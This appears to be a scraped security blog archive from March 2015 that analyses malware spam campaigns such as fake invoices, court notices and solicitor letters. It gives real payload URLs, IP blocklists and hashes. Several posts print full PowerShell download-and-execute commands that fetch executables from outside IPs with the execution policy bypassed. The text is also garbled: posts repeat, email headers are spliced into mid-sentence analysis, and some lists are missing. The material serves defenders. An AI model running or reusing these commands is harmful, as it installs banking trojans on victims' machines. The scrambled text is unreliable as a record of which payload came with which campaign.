From: salim@humdsolicitors.co.ukThe attachment is named passport.doc. It is exactly the same malicious payload as the one used in this spam run earlier today, and it drops the Dridex banking trojan on the victim's PC.
Date: 30 March 2015 at 11:58
Subject: FW: Passport copy
From: Raad Ali [mailto:raaduk@hotmail.com]
Sent: 26 March 2015 08:03
To: salim
Subject: Passport copy
Salam Salim,
Please find attached copy of the passport for my wife and daughter as requested. please note we need to complete on the purchase in 4 weeks from the agreed date.
Salam
Raad Ali
Tuesday, 31 March 2015
Malware spam: "FW: Passport copy" / "salim@humdsolicitors.co.uk"
This fake legal spam comes with a malicious attachment. It appears to be a forwarded message from a solicitors office, but it is just a simple forgery.
Malware spam: "Your PO: SP14619" / "Sam S. [sales@alicorp.com]"
This fake financial spam comes with a malicious attachment:
http://xianshabuchang.com/54/78.exe
which is saved as %TEMP%\kkaddap7b.exe. This malicious executable has a detection rate of 3/56. Various analysis tools [1] [2] [3] show that it phones home to the following IPs:
91.230.60.219 (Docker Ltd / ArtVisio Ltd, Russia)
185.91.175.39 (Webstyle Group LLC / Rohoster / MnogoByte, Russia)
46.101.38.178 (Digital Ocean, Netherlands)
87.236.215.103 (OneGbits, Lithuania)
66.110.179.66 (Microtech Tel, US)
176.108.1.17 (Cadr-TV LLE TVRC, Ukraine)
202.44.54.5 (World Internetwork Corporation, Thailand)
128.199.203.165 (DigitalOcean Cloud, Singapore)
According to the Malwr report it drops another version of itself called edg1.exe [VT 2/56] and what appears to be a Dridex DLL [VT 3/56].
Recommended blocklist:
91.230.60.0/24
185.91.175.0/24
46.101.38.178
87.236.215.103
66.110.179.66
176.108.1.17
202.44.54.5
128.199.203.165
MD5s:
f5ecc500c2b74612e33c0522104fb999
716d1dc7285b017c2dbc146dbb2e319c
2cb0f18ba030c1ab0ed375e4ce9c0342
6218264a6677a37f7e98d8c8bd2c13e9
UPDATE:
A couple of reports from Payload Security [1] [2] also give some insight into the malware, including an additional but well-known IP to block:
95.163.121.178 (Digital Networks CJSC aka DINETHOSTING, Russia)
From: Sam S. [sales@alicorp.com]In the sample I have seen, the attachment is APIPO1.doc with a VirusTotal detection rate of 5/56, and it contains this malicious macro [pastebin] which downloads a component from:
Date: 31 March 2015 at 07:45
Subject: Your PO: SP14619
Your PO No: SP14619 for a total of $ 13,607.46
has been sent to New Era Contract Sales Inc. today.
A copy of the document is attached
Regards,
New Era Contract Sales Inc.'s Document Exchange Team
http://xianshabuchang.com/54/78.exe
which is saved as %TEMP%\kkaddap7b.exe. This malicious executable has a detection rate of 3/56. Various analysis tools [1] [2] [3] show that it phones home to the following IPs:
91.230.60.219 (Docker Ltd / ArtVisio Ltd, Russia)
185.91.175.39 (Webstyle Group LLC / Rohoster / MnogoByte, Russia)
46.101.38.178 (Digital Ocean, Netherlands)
87.236.215.103 (OneGbits, Lithuania)
66.110.179.66 (Microtech Tel, US)
176.108.1.17 (Cadr-TV LLE TVRC, Ukraine)
202.44.54.5 (World Internetwork Corporation, Thailand)
128.199.203.165 (DigitalOcean Cloud, Singapore)
According to the Malwr report it drops another version of itself called edg1.exe [VT 2/56] and what appears to be a Dridex DLL [VT 3/56].
Recommended blocklist:
91.230.60.0/24
185.91.175.0/24
46.101.38.178
87.236.215.103
66.110.179.66
176.108.1.17
202.44.54.5
128.199.203.165
MD5s:
f5ecc500c2b74612e33c0522104fb999
716d1dc7285b017c2dbc146dbb2e319c
2cb0f18ba030c1ab0ed375e4ce9c0342
6218264a6677a37f7e98d8c8bd2c13e9
UPDATE:
A couple of reports from Payload Security [1] [2] also give some insight into the malware, including an additional but well-known IP to block:
95.163.121.178 (Digital Networks CJSC aka DINETHOSTING, Russia)
Wednesday, 25 March 2015
Malware spam: "Invoice ID:12ab34" / "123"
This terse spam has a malicious attachment:
Automated analysis doesn't show very much, but it does show the screenshots [1] [2]. I haven't been able to extract the VBscript in a neat enough format, but what did interest me is this novel obfuscation [pastebin] which actually just executes this:
92.63.88.83 (MWTV, Latvia)
82.151.131.129 (DorukNet, Turkey)
121.50.43.175 (Tsukaeru.net, Japan)
The payload is most likely Dridex.
Recommended blocklist:
92.63.88.0/24
82.151.131.129
121.50.43.175
MD5s:
ce130212d67070459bb519d67c06a291
461689d449c7b5a905c8404d3a464088
From: Gerry CarpenterThere is an Excel attachment with the same semi-random reference number as the subject (in the sample I saw it was 34bf33.xls) which currently has zero detections. Unlike most recent document-based attacks, this does not contain a macro, but instead has an embedded OLE object that will run a VBscript if clicked, the spreadsheet itself is designed to get the victim to click-and-run that object.
Date: 25 March 2015 at 12:58
Subject: Invoice ID:34bf33
123
Automated analysis doesn't show very much, but it does show the screenshots [1] [2]. I haven't been able to extract the VBscript in a neat enough format, but what did interest me is this novel obfuscation [pastebin] which actually just executes this:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.221/zxr/ssidin.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; Start-Process %TEMP%\JIOiodfhioIH.exe;Despite all the mucking about with expanding a CAB file, the downloaded file is actually an EXE file all along so nothing is done to it. This file has a detection rate of 7/56, and the Payload Security report shows it communicating with the following IPs:
92.63.88.83 (MWTV, Latvia)
82.151.131.129 (DorukNet, Turkey)
121.50.43.175 (Tsukaeru.net, Japan)
The payload is most likely Dridex.
Recommended blocklist:
92.63.88.0/24
82.151.131.129
121.50.43.175
MD5s:
ce130212d67070459bb519d67c06a291
461689d449c7b5a905c8404d3a464088
Malware spam: "James Dudley [James.Dudley@hitec.co.uk]" / "Payment 1142"
This spam email is yet another forgery pretending to be from a wholly legitimate company. It is one of a series of emails spoofing Cambridgeshire firms, and it comes with a malicious attachment.
http://madasi.homepage.t-online.de/dbcfg/32.exe
..which is then saved as %TEMP%\sollken1.2.8.exe, this has a detection rate of 12/57. Automated analysis of this binary is pending, but is so far inconclusive.
Incidentally, the macro contains this snippet:
' (File name: AddNewSheet.bas)
' Author: SENOO, Ken
' LICENSE: CC0
' (Last update: 2015-03-10T18:38+09:00)
All that means is that this Ken Senoo created and freely licensed a Visual Basic module that the bad guys are using. It does not mean that they have anything at all to do with this malware attack.
MD5s:
8f79a24970d9e7063ffcedc9a8d23429
02cfa3e6fdb4301528e5152de76b2abf
UPDATE: this interesting new tool from Payload Security gives some insight as to what the malware does. In particular, it phones home to:
50.31.1.21 (Steadfast Networks, US)
87.236.215.103 (OneGbits, Lithuania)
2.6.14.246 (Orange S.A., France)
14.96.207.127 (Tata Indicom, India)
95.163.121.178 (Digital Networks aka DINETHOSTING, Russia)
Recommended blocklist:
50.31.1.21
87.236.215.103
2.6.14.246
14.96.207.127
95.163.121.0/24
From: James Dudley [James.Dudley@hitec.co.uk]I have only seen a single sample of this, with an attachment Payment 1142.doc which has a VirusTotal detection rate of 5/57. It contains this malicious macro [pastebin] which attempts to download a component from:
Date: 25 March 2015 at 09:38
Subject: Payment 1142
Payment sheet attached.
James
T 01353 624023
F 01353 624043
Hitec Ltd
23 Regal Drive
Soham
Ely
Cambs
CB7 5BE
This message has been scanned for viruses and malicious content by Green Duck SpamLab
http://madasi.homepage.t-online.de/dbcfg/32.exe
..which is then saved as %TEMP%\sollken1.2.8.exe, this has a detection rate of 12/57. Automated analysis of this binary is pending, but is so far inconclusive.
Incidentally, the macro contains this snippet:
' (File name: AddNewSheet.bas)
' Author: SENOO, Ken
' LICENSE: CC0
' (Last update: 2015-03-10T18:38+09:00)
All that means is that this Ken Senoo created and freely licensed a Visual Basic module that the bad guys are using. It does not mean that they have anything at all to do with this malware attack.
MD5s:
8f79a24970d9e7063ffcedc9a8d23429
02cfa3e6fdb4301528e5152de76b2abf
UPDATE: this interesting new tool from Payload Security gives some insight as to what the malware does. In particular, it phones home to:
50.31.1.21 (Steadfast Networks, US)
87.236.215.103 (OneGbits, Lithuania)
2.6.14.246 (Orange S.A., France)
14.96.207.127 (Tata Indicom, India)
95.163.121.178 (Digital Networks aka DINETHOSTING, Russia)
Recommended blocklist:
50.31.1.21
87.236.215.103
2.6.14.246
14.96.207.127
95.163.121.0/24
Tuesday, 24 March 2015
Malware spam: "Notice to Appear" / "Notice to appear in Court #0000310657"
These two emails come with a malicious attachment:
In these two case the attachments were named Court_Notification_0000310657.zip and Notice_to_Appear_000283436.zip containing the malicious scripts Court_Notification_0000310657.doc.js [VirusTotal 7/57] [pastebin] [deobfuscated] and Notice_to_Appear_000283436.doc.js [VirusTotal 6/57] [pastebin] [deobfuscated] respectively.
These scripts attempt to download malicious code from the following sites:
pitfaa.nidhog.com
ilarf.net
gurutravel.co.nz
lawyermyowin.com
www.lead.com.co
Details in the download locations vary, but are in the format:
ilarf.net/document.php?rnd=1161&id=
gurutravel.co.nz/document.php?rnd=3022&id=
This leads to a randomly-named file with a GIF extension which is actually one of two malicious EXE files, with detection rates of 6/57 and 4/56. One of those produces a valid Malwr report, the other smaller EXE doesn't seem to do anything.
The executable that seems to do something POSTs to a Turkish server at 176.53.125.25 (Radore Veri Merkezi Hizmetleri A.S.). Various Malwr reports [1] [2] [3] [4] [5] [6] indicate badness on at least the following IPs:
176.53.125.20
176.53.125.21
176.53.125.22
176.53.125.23
176.53.125.24
176.53.125.25
I would suggest blocking at least those IPs, or perhaps 176.53.125.16/28 or if you don't mind blocking access to a few legitimate Turkish sites you could perhaps block 176.53.125.16/24.
I am not 100% certain of the payload, however some servers in that cluster have been fingered for serving the Trapwot fake anti-virus software.
MD5s:
2d65371ac458c7d11090aca73566e3d4
da63f87243a971edca7ecd214e6fdeb1
77d8670f80c3c1de81fb2a1bf05a84b5
d48ef4bb0549a67083017169169ef3ee
From: County Court [lester.hicks@whw0095.whservidor.com]
Date: 24 March 2015 at 16:45
Subject: AERO, Notice to Appear
This is to inform you to appear in the Court on the March 31 for your case hearing.
Please, prepare all the documents relating to the case and bring them to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.
You can review complete details of the Court Notice in the attachment.
Yours faithfully,
Lester Hicks,
Court Secretary.
-------------
From: District Court [cody.bowman@p3nw8sh177.shr.prod.phx3.secureserver.net]
Date: 24 March 2015 at 16:44
Subject: AERO, Notice to appear in Court #0000310657
Dear Aero,
This is to inform you to appear in the Court on the March 28 for your case hearing.
You are kindly asked to prepare and bring the documents relating to the case to Court on the specified date.
Note: If you do not come, the case will be heard in your absence.
You can review complete details of the Court Notice in the attachment.
Sincerely,
Cody Bowman,
District Clerk.
In these two case the attachments were named Court_Notification_0000310657.zip and Notice_to_Appear_000283436.zip containing the malicious scripts Court_Notification_0000310657.doc.js [VirusTotal 7/57] [pastebin] [deobfuscated] and Notice_to_Appear_000283436.doc.js [VirusTotal 6/57] [pastebin] [deobfuscated] respectively.
These scripts attempt to download malicious code from the following sites:
pitfaa.nidhog.com
ilarf.net
gurutravel.co.nz
lawyermyowin.com
www.lead.com.co
Details in the download locations vary, but are in the format:
ilarf.net/document.php?rnd=1161&id=
gurutravel.co.nz/document.php?rnd=3022&id=
This leads to a randomly-named file with a GIF extension which is actually one of two malicious EXE files, with detection rates of 6/57 and 4/56. One of those produces a valid Malwr report, the other smaller EXE doesn't seem to do anything.
The executable that seems to do something POSTs to a Turkish server at 176.53.125.25 (Radore Veri Merkezi Hizmetleri A.S.). Various Malwr reports [1] [2] [3] [4] [5] [6] indicate badness on at least the following IPs:
176.53.125.20
176.53.125.21
176.53.125.22
176.53.125.23
176.53.125.24
176.53.125.25
I would suggest blocking at least those IPs, or perhaps 176.53.125.16/28 or if you don't mind blocking access to a few legitimate Turkish sites you could perhaps block 176.53.125.16/24.
I am not 100% certain of the payload, however some servers in that cluster have been fingered for serving the Trapwot fake anti-virus software.
MD5s:
2d65371ac458c7d11090aca73566e3d4
da63f87243a971edca7ecd214e6fdeb1
77d8670f80c3c1de81fb2a1bf05a84b5
d48ef4bb0549a67083017169169ef3ee
Labels:
Fake Anti-Virus,
Malware,
Spam,
Turkey,
Viruses
Malware spam: "Mary Watkins [mary@elydesigngroup.co.uk]" / "Invoice"
This spam email message does not come from Ely Design Group, but is in fact just a simple forgery. Ely Design Group's systems have not been compromised in any way. This email comes with a malicous attachment.
http://dogordie.de/js/bin.exe
The file is saved as %TEMP%\PALmisc2.5.2.exe and has a VirusTotal detection rate of 6/57.
Automated analysis tools [1] [2] [3] [4] [5] indicate that the binary crashes in those test environments. although whether or not it will work on a live PC is another matter. The payload (if it works) is almost definitely the Dridex banking trojan.
From: Mary Watkins [mary@elydesigngroup.co.uk]Attached is a Word document named S22C-6e15031710060.doc which has a low detection rate of 2/57 which contains this malicious macro [pastebin] which then downloads a component from the following location:
Date: 24 March 2015 at 07:23
Subject: Invoice
Hi,
As promised!
--
Mary Watkins
Office Manager
Ely Design Group
http://dogordie.de/js/bin.exe
The file is saved as %TEMP%\PALmisc2.5.2.exe and has a VirusTotal detection rate of 6/57.
Automated analysis tools [1] [2] [3] [4] [5] indicate that the binary crashes in those test environments. although whether or not it will work on a live PC is another matter. The payload (if it works) is almost definitely the Dridex banking trojan.
Friday, 20 March 2015
Something evil on 85.143.216.102 and 94.242.205.101
I will confess that I don't have much information on what this apparent exploit kit is or how it works, but there seems to be something evil on 94.242.205.101 (root SA, Luxembourg) [VT report] being reached via 85.143.216.102 (AirISP, Russia) [VT report].
Whatever it is, it is using subdomains from hijacked GoDaddy accounts [1] [2] which is a clear sign of badness. The hijacked GoDaddy domains change very quickly, but these have all been used in the past day or so on both those IPs:
dchsleep.com
manymike.com
vladeasa.com
ezdockparts.com
suurtampere.com
visikreatif.com
josemiguelez.com
reformapenal.com
axwaydropzone.com
capitolskopje.com
theantennapub.com
faceofsustengo.com
niagarajournal.com
crystalbeachhill.com
ezdockadirondacks.com
ezdockfingerlakes.com
chambel.info
lidifaria.info
ewwebinars.co
cybercoaching.co
ewwebinars.com
eyouthcounseling.com
ecounselingnation.com
epastoralcounseling.com
extraordinaryfamilies.com
drtim.net
drclinton.net
ewomencast.net
ecounseling.net
drtimclinton.net
ecouplecounseling.net
biblicalcoachingtoday.net
drclinton.org
For practical purposes though I recommend you block traffic to the IPs rather than the domains.
Recommended blocklist:
85.143.216.102
94.242.205.101
UPDATE:
These following nearby IPs have also been distributing badness. I recommend you block these too:
85.143.216.103
94.242.205.98
Whatever it is, it is using subdomains from hijacked GoDaddy accounts [1] [2] which is a clear sign of badness. The hijacked GoDaddy domains change very quickly, but these have all been used in the past day or so on both those IPs:
dchsleep.com
manymike.com
vladeasa.com
ezdockparts.com
suurtampere.com
visikreatif.com
josemiguelez.com
reformapenal.com
axwaydropzone.com
capitolskopje.com
theantennapub.com
faceofsustengo.com
niagarajournal.com
crystalbeachhill.com
ezdockadirondacks.com
ezdockfingerlakes.com
chambel.info
lidifaria.info
ewwebinars.co
cybercoaching.co
ewwebinars.com
eyouthcounseling.com
ecounselingnation.com
epastoralcounseling.com
extraordinaryfamilies.com
drtim.net
drclinton.net
ewomencast.net
ecounseling.net
drtimclinton.net
ecouplecounseling.net
biblicalcoachingtoday.net
drclinton.org
For practical purposes though I recommend you block traffic to the IPs rather than the domains.
Recommended blocklist:
85.143.216.102
94.242.205.101
UPDATE:
These following nearby IPs have also been distributing badness. I recommend you block these too:
85.143.216.103
94.242.205.98
Labels:
Evil Network,
Luxembourg. GoDaddy,
Russia
Thursday, 19 March 2015
Malware spam: "Invoice ID:987654321 in attachment." from random senders
This spam has no body text and a randomly-generated sender name and invoice ID number. Sample subjects include:
Invoice ID:07dda8035 in attachment.
Invoice ID:09bf252 in attachment.
Invoice ID:108df399 in attachment.
Invoice ID:11847972 in attachment.
Invoice ID:156a35519 in attachment.
Invoice ID:16bb539 in attachment.
Invoice ID:16de0833 in attachment.
Invoice ID:17ff9887 in attachment.
Invoice ID:19b5b30 in attachment.
Sample senders:
Angelia Oliver
Annette Hunter
Austin Bennett
Belinda Cameron
Brittney Dixon
Buster Nolan
Candace Bowers
Christian Kemp
Clarissa Gentry
Cruz Mcintosh
Doug Haney
Dylan Poole
Erwin Hale
Gordon Downs
Hallie Neal
Oscar Bradshaw
Reyna Carver
Rosalie Acevedo
Sid Alston
Sophia Scott
Tanner Puckett
Tia Kline
Trudy Hensley
Valerie Delaney
Ivy Stokes
Jeanie Frye
Karin Frank
Kayla Travis
Mai Rowland
Marilyn Fleming
Minerva Glover
The Word document contains an embedded OLE object that leads to a malicious VBA macro. The payload is exactly the same as the one used in this attack.
Invoice ID:07dda8035 in attachment.
Invoice ID:09bf252 in attachment.
Invoice ID:108df399 in attachment.
Invoice ID:11847972 in attachment.
Invoice ID:156a35519 in attachment.
Invoice ID:16bb539 in attachment.
Invoice ID:16de0833 in attachment.
Invoice ID:17ff9887 in attachment.
Invoice ID:19b5b30 in attachment.
Sample senders:
Angelia Oliver
Annette Hunter
Austin Bennett
Belinda Cameron
Brittney Dixon
Buster Nolan
Candace Bowers
Christian Kemp
Clarissa Gentry
Cruz Mcintosh
Doug Haney
Dylan Poole
Erwin Hale
Gordon Downs
Hallie Neal
Oscar Bradshaw
Reyna Carver
Rosalie Acevedo
Sid Alston
Sophia Scott
Tanner Puckett
Tia Kline
Trudy Hensley
Valerie Delaney
Ivy Stokes
Jeanie Frye
Karin Frank
Kayla Travis
Mai Rowland
Marilyn Fleming
Minerva Glover
The Word document contains an embedded OLE object that leads to a malicious VBA macro. The payload is exactly the same as the one used in this attack.
Malware spam: "Aspiring Solicitors Debt Collection" has mystery XML attachment
This spam has a malicious attachment.
Analysis is currently pending, this appears to have several new techniques to avoid detection. According to this Twitter conversation one version attempts to download a binary from 91.226.93.51/smoozy/shake.exe although this is currently timing out for me. For security analysts, a sample of the XML file can be found here.
IMPORTANT: if you have opened this document in Word then there is a good chance that you are infected. I would recommend that you shut down any machine that has opened this. Anti-virus detections are currently very poor, but vendors may have signature available soon, I would wait 24 hours before attempting to disinfect any infected machine. Dridex collects banking passwords, so it is important that machines are not used for financial transactions.
UPDATE:
This particular attack uses some novel features. Opening the Word document reveals what appears to be an embedded XLS file:
There's some interesting metadata.. created by "Dredex" of "Ph0enix Team", then modified by "ПРроываААА".
In the typical attack scenario, opening the embedded file will force the macro to run. In this case, I used LibreOffice on a Linux box which does not support VBA. This revealed the malicious code, which looks like this.
A bit of copy-and-pasting reveals nothing more sophisticated than some Base 64 encoded text that attempts to run one of the following commands:
193.26.217.199 (Servachok Ltd, Russia)
91.226.93.51 (Sobis OOO, Russia)
91.227.18.76 (Eximius LLC, Russia)
176.31.28.244 (OVH, France / Bitweb LLC, Russia)
"shake.exe" has a VirusTotal detection rate of 3/57. Between that VirusTotal report and this Malwr report we can see the malware attempting to connect to:
95.163.121.33 (Digital Networks aka DINETHOSTING, Russia)
87.236.215.105 (OneGbits, Lithuania)
31.160.233.212 (KPN Zakelijk Internet, Netherlands)
Further analysis is pending.
Recommended blocklist:
193.26.217.199
91.226.93.51
91.227.18.76
176.31.28.244
95.163.121.0/24
87.236.215.105
31.160.233.212
Date: 19 March 2015 at 12:52Attached is a file with a random numerical name (e.g. 802186031.doc) which is in fact a malicious XML file that appears to drop the Dridex banking trojan. Indication are that this can run even with macros disabled. Each attachment has a unique MD5.
Subject: Aspiring Solicitors Debt Collection
Aspiring Solicitors
Ref : 195404544
Date : 02.10.2014
Dear Sir, Madam
Re: Our Client Bank of Scotland PLC
Account Number:77666612
Balance: 2,345.00
We are instructed by Bank of Scotland PLC in relation to the above matter.
You are required to pay the balance of GBP 2,345.00 in full within 7(seven) days from the date of this email to avoid Country Court proceedings being issued against you. Once proceedings have been issued, you will be liable for court fees and solicitors costs detailed below.
Court Fees GBP 245.00
Solicitors Costs GBP 750.00
Cheques or Postal Orders should be made payable to Bank of Scotland PLC and sent to the address in attachment below quoting the above account number.
We are instructed by our Client that they can accept payment by either Debit or Credit Card.If you wish to make a payment in this wa, then please contact us with your Card details. We will then pass these details on to our Client in order that they may process your agreed payment. Kindly note that any payment made will be shown on your Bank and/or Credit Card Statement as being made to Bank of Scotland PLC
If you have any queries regarding this matter or have a genuine reason for non payment, you should contact us within 7 days from the date of this email to avoid legal proceedings being issued against you, by filling the contact us form in attachment below.
Yours faithfully,
Shawn Ballard
Aspiring Solicitors
Department CCD, Box 449
Upper Ground Floor
1-5 Queens Road Quadrant
Brighton
BN1 3XJ
United Kingdom
Analysis is currently pending, this appears to have several new techniques to avoid detection. According to this Twitter conversation one version attempts to download a binary from 91.226.93.51/smoozy/shake.exe although this is currently timing out for me. For security analysts, a sample of the XML file can be found here.
IMPORTANT: if you have opened this document in Word then there is a good chance that you are infected. I would recommend that you shut down any machine that has opened this. Anti-virus detections are currently very poor, but vendors may have signature available soon, I would wait 24 hours before attempting to disinfect any infected machine. Dridex collects banking passwords, so it is important that machines are not used for financial transactions.
UPDATE:
This particular attack uses some novel features. Opening the Word document reveals what appears to be an embedded XLS file:
There's some interesting metadata.. created by "Dredex" of "Ph0enix Team", then modified by "ПРроываААА".
In the typical attack scenario, opening the embedded file will force the macro to run. In this case, I used LibreOffice on a Linux box which does not support VBA. This revealed the malicious code, which looks like this.
A bit of copy-and-pasting reveals nothing more sophisticated than some Base 64 encoded text that attempts to run one of the following commands:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.199/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;FYI, those IPs are allocated as follows:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://91.226.93.51/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://91.227.18.76/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://176.31.28.244/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
193.26.217.199 (Servachok Ltd, Russia)
91.226.93.51 (Sobis OOO, Russia)
91.227.18.76 (Eximius LLC, Russia)
176.31.28.244 (OVH, France / Bitweb LLC, Russia)
"shake.exe" has a VirusTotal detection rate of 3/57. Between that VirusTotal report and this Malwr report we can see the malware attempting to connect to:
95.163.121.33 (Digital Networks aka DINETHOSTING, Russia)
87.236.215.105 (OneGbits, Lithuania)
31.160.233.212 (KPN Zakelijk Internet, Netherlands)
Further analysis is pending.
Recommended blocklist:
193.26.217.199
91.226.93.51
91.227.18.76
176.31.28.244
95.163.121.0/24
87.236.215.105
31.160.233.212
Malware spam: "sales@marflow.co.uk" / "Your Sales Order"
This spam run pretends to come from Marflow Engineering but it doesn't, instead it is a simple forgery. Marflow are not sending out this email, nor have their systems been compromised in any way.
If you see this, then you have had a lucky escape because the attachment is in the wrong format and is Base 64 encoded. If you manually run a Base 64 decoder against it then you end up with a malicious XLS file, in one of three different flavours with low detection rates [1] [2] [3] which in turn each contain a slightly different malicious macro [1] [2] [3] which then attempt to download from the following locations:
http://www.lenhausen.de/js/bin.exe
http://meostore.net/js/bin.exe
http://mvw1919.de/js/bin.exe
This is saved in the %TEMP% folder under the filenames pirit86.exe, tikapom64.exe and Trekaldo51.exe (although the binary is the same in each case). This malicious binary has a detection rate of just 2/57 and according to the Malwr report, it phone home to the following IPs:
37.139.47.81 (Pirix, Russia)
5.100.249.215 (OMC Computers & Communications, Israel)
195.162.107.7 (Gamma Telecom, UK)
131.111.37.221 (University of Cambridge, UK)
198.245.70.182 (Deniz Toprak, Turkey / B2 Net Solutions, US)
210.205.74.43 (DAEMINCUSTOM, Korea)
46.228.193.201 (Aqua Networks Ltd, Germany)
It also drops another version of the downloader, edg1.exe which has a detection rate of 1/56 and a DLL with a detection rate of also of 1/57. The payload is the Dridex banking trojan.
Recommended blocklist:
37.139.47.0/24
5.100.249.215
195.162.107.7
131.111.37.221
198.245.70.182
210.205.74.43
46.228.193.201
From: sales@marflow.co.ukAttached is a file 611866.xls which appears to come in at least three different versions. But due to an error in the way the spam has been created, the attachment is actually corrupt and (depending on your version of Excel) attempting to open it gives this error:
Date: 19 March 2015 at 09:13
Subject: Your Sales Order
Your order acknowledgment is attached.
Please check carefully and advise us of any issues.
Best regards
Marflow
The file you are trying to open, '611866.xls', is in a different format than specified by the file extension. Verify that the file is not corrupted and is from a trusted source before opening the file. Do you want to open the file now?Clicking OK loads up what looks like gobbledegook.
If you see this, then you have had a lucky escape because the attachment is in the wrong format and is Base 64 encoded. If you manually run a Base 64 decoder against it then you end up with a malicious XLS file, in one of three different flavours with low detection rates [1] [2] [3] which in turn each contain a slightly different malicious macro [1] [2] [3] which then attempt to download from the following locations:
http://www.lenhausen.de/js/bin.exe
http://meostore.net/js/bin.exe
http://mvw1919.de/js/bin.exe
This is saved in the %TEMP% folder under the filenames pirit86.exe, tikapom64.exe and Trekaldo51.exe (although the binary is the same in each case). This malicious binary has a detection rate of just 2/57 and according to the Malwr report, it phone home to the following IPs:
37.139.47.81 (Pirix, Russia)
5.100.249.215 (OMC Computers & Communications, Israel)
195.162.107.7 (Gamma Telecom, UK)
131.111.37.221 (University of Cambridge, UK)
198.245.70.182 (Deniz Toprak, Turkey / B2 Net Solutions, US)
210.205.74.43 (DAEMINCUSTOM, Korea)
46.228.193.201 (Aqua Networks Ltd, Germany)
It also drops another version of the downloader, edg1.exe which has a detection rate of 1/56 and a DLL with a detection rate of also of 1/57. The payload is the Dridex banking trojan.
Recommended blocklist:
37.139.47.0/24
5.100.249.215
195.162.107.7
131.111.37.221
198.245.70.182
210.205.74.43
46.228.193.201
Wednesday, 18 March 2015
Malware spam: "JP Morgan Access [Carrie.Tolstedt@jpmorgan.com]" / "FW: Customer account docs"
From: JP Morgan Access [Carrie.Tolstedt@jpmorgan.com]
Date: 18 March 2015 at 17:49
Subject: FW: Customer account docs
|
As it happens, Carrie L Tolstedt is a real executive... at Wells Fargo. The lady in the picture is another Wells Fargo employee entirely.
But anyway, this is a simple forgery containing a link to a file at Cubby which downloads as Documents_JP3922PV8.zip and contains a malicious file Documents_JP3922PV8.exe which has a icon to make it look like an Adobe acrobat file.
The executable has a low VirusTotal detection rate of 3/57. Various automated analysis tools [1] [2] [3] [4] show the malware downloading additional components from:
bej-it-solutions.com/pvt/ixusn.rtf
capslik.com/mandoc/ixusn.rtf
It then attempts to POST data to an IP at 109.230.131.95 (Vsevnet Ltd. Russia) which is a critical IP to block if you want to protect yourself against this type of Upatre / Dyre attack.
The Malwr report also shows that amongst other things it downloads an executable lwxzqrk36.exe which has a detection rate of just 2/57. That Malwr report also shows that it downloads and pops up a PDF about drone strikes.
Source: malwr.com |
The download locations for this Upatre/Dyre combination change all the time, but the IP address of 109.230.131.95 has been around for a little while. Also, it is a characteristic of this malware that it calls out to checkip.dyndns.org to determine the client IP address.. monitoring for traffic going to that location can be a useful indicator of infection.
ssssssssssss
Malware spam: "Your online Gateway.gov.uk Submission"
This spam leads to a malicious ZIP file hosted either on Dropbox or Cubby.
canabrake.com.mx/css/doc11.rtf
straphael.org.uk/youth2000_files/doc11.rtf
My sources indicate that this most likely phones home to 109.230.131.95 (Vsevnet Ltd. Russia) which is a known bad IP that I recommend blocking. The payload appears to be the Upatre downloader leading to the Dyre banking trojan.
From: Gateway.gov.ukThe link leads to an archive file Avis_De_Paiement.zip which in turn contains a malicious binary Avis_De_Paiement.scr which has a VirusTotal detection rate of 16/57. ThreatExpert and Comodo CAMAS report that it downloads components from the following locations:
Date: 18 March 2015 at 13:19
Subject: Your online Gateway.gov.uk Submission
Electronic Submission Gateway
Thank you for your submission for the Government Gateway.
The Government Gateway is the UK's centralized registration service for e-Government services.
To view/download your form to the Government Gateway please visit http://www.gateway.gov.uk/file/s/gdvzk7toum8ghnc/SecureDocument.zip?dl=1
This is an automatically generated email. Please do not reply as the email address is not
monitored for received mail.
gov.uk - the best place to find government services and information - Opens in new window
The best place to find government services and information
canabrake.com.mx/css/doc11.rtf
straphael.org.uk/youth2000_files/doc11.rtf
My sources indicate that this most likely phones home to 109.230.131.95 (Vsevnet Ltd. Russia) which is a known bad IP that I recommend blocking. The payload appears to be the Upatre downloader leading to the Dyre banking trojan.
Malware spam: "December unpaid invoice notification"
This spam comes with no body text, but does come with a malicious attachment.
This Malwr report shows it downloading a DLL with an MD5 of a40e588e614e6a4c9253d261275288bf [VT 4/57] which is the same payload as found in this earlier spam run, along with another executable with an MD5 of 409397f092d3407f95be42903172cf06 which is not in the VirusTotal database. The report also shows the malware phoning home to the following IPs:
31.25.77.154 (Call U Communications, Palestine)
95.163.121.33 (Digital Networks CJSC aka DINETHOSTING, Russia)
188.165.5.194 (OVH, Ireland)
188.165.26.237 (OVH, Latvia)
115.241.60.56 (Reliance Communication, India)
46.19.143.151 (Private Layer INC, Switzerland)
Recommended blocklist:
31.25.77.154
95.163.121.0/24
188.165.5.194
188.165.26.237
115.241.60.56
46.19.143.151
176.31.28.244
From: Korey MackSo far I have only seen a single sample with an attached file called 11IDJ325.doc which is undetected by AV vendors. Inside is a malicious macro [pastebin] with an encrypted section that executes this:
Date: 18 March 2015 at 11:04
Subject: December unpaid invoice notification
